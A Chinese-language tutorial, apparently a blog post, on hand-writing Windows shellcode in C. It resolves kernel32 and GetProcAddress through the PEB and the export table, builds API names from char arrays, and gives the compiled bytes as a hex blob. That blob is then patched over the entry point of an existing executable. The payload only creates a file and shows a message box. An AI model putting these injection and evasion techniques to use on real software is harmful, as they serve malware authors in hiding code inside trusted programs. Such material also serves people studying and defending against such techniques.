这里先写个简单的静态加载到exe文件中,明天再来写个动态的
因为vs编译后自己会生成很多东西,我们稍微配置下
先获取kernel32基址
代码语言:javascript复制__declspec(naked) DWORD getKernel32()
{
__asm
{
mov eax, fs:[30h] //PEB
mov eax, [eax 0ch] //PEB->Ldr
mov eax, [eax 14h] //PEB->Ldr.InMemOrder
mov eax, [eax] //第二个模块
mov eax, [eax] //第三个模块
mov eax, [eax 10h] //base address
ret
}
}获取GetProcAddress函数地址
代码语言:javascript复制FARPROC getProcAddress(HMODULE hModuleBase)
{
PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
PIMAGE_NT_HEADERS32 lpNtHeader = (PIMAGE_NT_HEADERS32)((DWORD)hModuleBase lpDosHeader->e_lfanew);
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
{
return NULL;
}
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)
{
return NULL;
}
PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModuleBase (DWORD)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD lpdwFunName = (PDWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfNames);
PWORD lpwOrd = (PWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfNameOrdinals);
PDWORD lpdwFunAddr = (PDWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfFunctions);
DWORD dwLoop = 0;
FARPROC pRet = NULL;
for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop )
{
char* pFunName = (char*)(lpdwFunName[dwLoop] (DWORD)hModuleBase);
if (pFunName[0] == 'G' &&
pFunName[1] == 'e' &&
pFunName[2] == 't' &&
pFunName[3] == 'P' &&
pFunName[4] == 'r' &&
pFunName[5] == 'o' &&
pFunName[6] == 'c' &&
pFunName[7] == 'A' &&
pFunName[8] == 'd' &&
pFunName[9] == 'd' &&
pFunName[10] == 'r' &&
pFunName[11] == 'e' &&
pFunName[12] == 's' &&
pFunName[13] == 's')
{
pRet = (FARPROC)(lpdwFunAddr[lpwOrd[dwLoop]] (DWORD)hModuleBase);
break;
}
}
return pRet;
}首先定义ms-dos头
代码语言:javascript复制//some code……
PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;然后得到pe头image-nt-header
代码语言:javascript复制//some code……
PIMAGE_NT_HEADERS32 lpNtHeader = (PIMAGE_NT_HEADERS32)((DWORD)hModuleBase lpDosHeader->e_lfanew);直接dos头加e_lfanew,这里因为是c 代码就不用汇编写入偏移地址3c等等,后面也要贴上汇编代码,结合一起看其实也不难理解
代码语言:javascript复制//some code……
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
{
return NULL;
}
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)
{
return NULL;
}这里还是贴上这个图(转载的图)
在pe-option-header里面存在一个size和virualaddress,我们还是主要看 VirtualAddress(相对虚拟地址)字段,我们得到这个结构体
代码语言:javascript复制//some code……
PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModuleBase (DWORD)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);我们将会使用这个结构的如下字段:
AddressOfFunctions:指向一个DWORD类型的数组,每个数组元素指向一个函数地址。AddressOfNames:指向一个DWORD类型的数组,每个数组元素指向一个函数名称的字符串。AddressOfNameOrdinals:指向一个WORD类型的数组,每个数组元素表示相应函数的排列序号(16位整数)
代码语言:javascript复制//some code……
PDWORD lpdwFunName = (PDWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfNames);
PWORD lpwOrd = (PWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfNameOrdinals);
PDWORD lpdwFunAddr = (PDWORD)((DWORD)hModuleBase (DWORD)lpExports->AddressOfFunctions);然后判断是否为GetProcAddress函数是就返回
代码语言:javascript复制//some code……
DWORD dwLoop = 0;
FARPROC pRet = NULL;
for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop )
{
char* pFunName = (char*)(lpdwFunName[dwLoop] (DWORD)hModuleBase);
if (pFunName[0] == 'G' &&
pFunName[1] == 'e' &&
pFunName[2] == 't' &&
pFunName[3] == 'P' &&
pFunName[4] == 'r' &&
pFunName[5] == 'o' &&
pFunName[6] == 'c' &&
pFunName[7] == 'A' &&
pFunName[8] == 'd' &&
pFunName[9] == 'd' &&
pFunName[10] == 'r' &&
pFunName[11] == 'e' &&
pFunName[12] == 's' &&
pFunName[13] == 's')
{
pRet = (FARPROC)(lpdwFunAddr[lpwOrd[dwLoop]] (DWORD)hModuleBase);
break;
}
}
return pRet;头部再定义一下
代码语言:javascript复制//some code……
DWORD getKernel32();
FARPROC getProcAddress(HMODULE hModuleBase);这里kernel32.dll和GetProcess函数地址都得到了后面就好说了
这里我们举CreateFile和Messagebox例子
这里是原来应该得写法
代码语言:javascript复制//some code……
typedef HANDLE(WINAPI *FN_CreateFileA)(
_In_ LPCSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
FN_CreateFileA fn_CreateFileA = (FN_CreateFileA)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateFileA");先得到GetProcAddress
代码语言:javascript复制typedef FARPROC(WINAPI * FN_GetProcAddress)(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);
FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());然后把"CreateFileA"字符串替换了
代码语言:javascript复制char szCreateFile[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A',0 };这里完整为
代码语言:javascript复制typedef FARPROC(WINAPI * FN_GetProcAddress)(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);
FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
typedef HANDLE(WINAPI *FN_CreateFileA)(
_In_ LPCSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
char szCreateFile[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A',0 };
FN_CreateFileA fn_CreateFileA = (FN_CreateFileA)fn_GetProcAddress((HMODULE)getKernel32(), szCreateFile);
char szNewFile[] = { '1', '.', 't', 'x', 't', '�' };
fn_CreateFileA(szNewFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);下面为MessageBoxA
代码语言:javascript复制typedef HMODULE (WINAPI* FN_LoadLibraryA)(
_In_ LPCSTR lpLibFileName
);
char szLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0 };
FN_LoadLibraryA fn_LoadLibraryA = (FN_LoadLibraryA)fn_GetProcAddress((HMODULE)getKernel32(), szLoadLibraryA);
typedef int (WINAPI* FN_MessageBoxA)(
_In_opt_ HWND hWnd,
_In_opt_ LPCSTR lpText,
_In_opt_ LPCSTR lpCaption,
_In_ UINT uType);
//正常写法
//FN_MessageBoxA fn_MessageBoxA = (FN_MessageBoxA)GetProcAddress(LoadLibraryA("user32.dll"), "MessageBoxA");
char szUser32[] = { 'U', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 };
char szMessageboxA[] = { 'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0 };
FN_MessageBoxA fn_MessageBoxA = (FN_MessageBoxA)fn_GetProcAddress(fn_LoadLibraryA(szUser32), szMessageboxA);
char szHello[] = { 'y', 'i', 'c', 'u', 'n', 'y', 'i', 'y', 'e', 0 };
char szTip[] = { 't', 'i', 'p', 0 };
fn_MessageBoxA(NULL, szHello, szTip, MB_OK);看看正常写法
代码语言:javascript复制FN_MessageBoxA fn_MessageBoxA = (FN_MessageBoxA)GetProcAddress(LoadLibraryA("user32.dll"), "MessageBoxA");因为获取得是user32.dll而不是直接一样得kernel32.dll所以我们要获取下LoadLibraryA得地址
代码语言:javascript复制typedef HMODULE (WINAPI* FN_LoadLibraryA)(
_In_ LPCSTR lpLibFileName
);
char szLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A', 0 };
FN_LoadLibraryA fn_LoadLibraryA = (FN_LoadLibraryA)fn_GetProcAddress((HMODULE)getKernel32(), szLoadLibraryA);然后就是获取MessageBoxA得地址
代码语言:javascript复制typedef int (WINAPI* FN_MessageBoxA)(
_In_opt_ HWND hWnd,
_In_opt_ LPCSTR lpText,
_In_opt_ LPCSTR lpCaption,
_In_ UINT uType);
//正常写法
//FN_MessageBoxA fn_MessageBoxA = (FN_MessageBoxA)GetProcAddress(LoadLibraryA("user32.dll"), "MessageBoxA");
char szUser32[] = { 'U', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 };
char szMessageboxA[] = { 'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0 };
FN_MessageBoxA fn_MessageBoxA = (FN_MessageBoxA)fn_GetProcAddress(fn_LoadLibraryA(szUser32), szMessageboxA);最后再输出
代码语言:javascript复制char szHello[] = { 'y', 'i', 'c', 'u', 'n', 'y', 'i', 'y', 'e', 0 };
char szTip[] = { 't', 'i', 'p', 0 };
fn_MessageBoxA(NULL, szHello, szTip, MB_OK);运行结果可以看到没什么问题
然后我们peid打开
看下偏移是400然后我们ue打开然后找到对应得偏移地址复制这个16进制就是我们需要的shellcode,然后把shellcode插入到进程中执行就可以了,这里我们可以静态得插入到未执行得exe文件中,或者动态的插入到正在执行得进程的内存中,这里我们试试插入到未执行的exe文件中
代码语言:javascript复制558BEC83EC4C56E8E40000008BC8E8FD0000008BF0C745D0437265618D45D0C745D47465466950C745D86C654100E8BD00000050FFD66A006A006A026A006A0068000000408D4DF4C745F4312E74785166C745F87400FFD08D45B4C745B44C6F616450C745B84C696272C745BC61727941C645C000E87600000050FFD68D4DC4C745DC55736572518D4DDCC745E033322E645166C745E46C6CC645E600C745C44D657373C745C861676542C745CC6F784100FFD050FFD66A008D4DFCC745E879696375518D4DE8C745EC6E796979516A0066C745F06500C745FC74697000FFD033C05E8BE55DC3CCCCCCCCCCCCCCCCCC64A1300000008B400C8B40148B008B008B4010C3CCCCCCCCCCCCCCCCCCCCCCCC558BEC8BD183EC088B423C837C107C00750633C08BE55DC38B44107885C074F28B4C102403CA538B5C1020894DFC03DA8B4C101C568B74101803CA57894DF833FF33C94E8B048B03C2803847754E80780165754880780274754280780350753C8078047275368078056F753080780663752A80780741752480780864751E80780964751880780A72751280780B65750C80780C73750680780D73740E413BCE76A38BC75F5E5B8BE55DC38B45FC8B7DF80FB704488B3C8703FA8BC75F5E5B8BE55DC30000这里是29行 4个,我用以前写的端口扫描做测试
先看看入口的文件偏移
000C23A0然后用winhex打开
然后我们转到偏移地址
修改同样大小他shellcode替换了,所以只要运行这个exe就会运行我们的shellcode
然后我们保存运行
说明我们的shellcode插入了这个exe中,执行他就执行了我们的shellcode
我们也可以把他shellcode生成为一个bin文件再写个加载器运行。
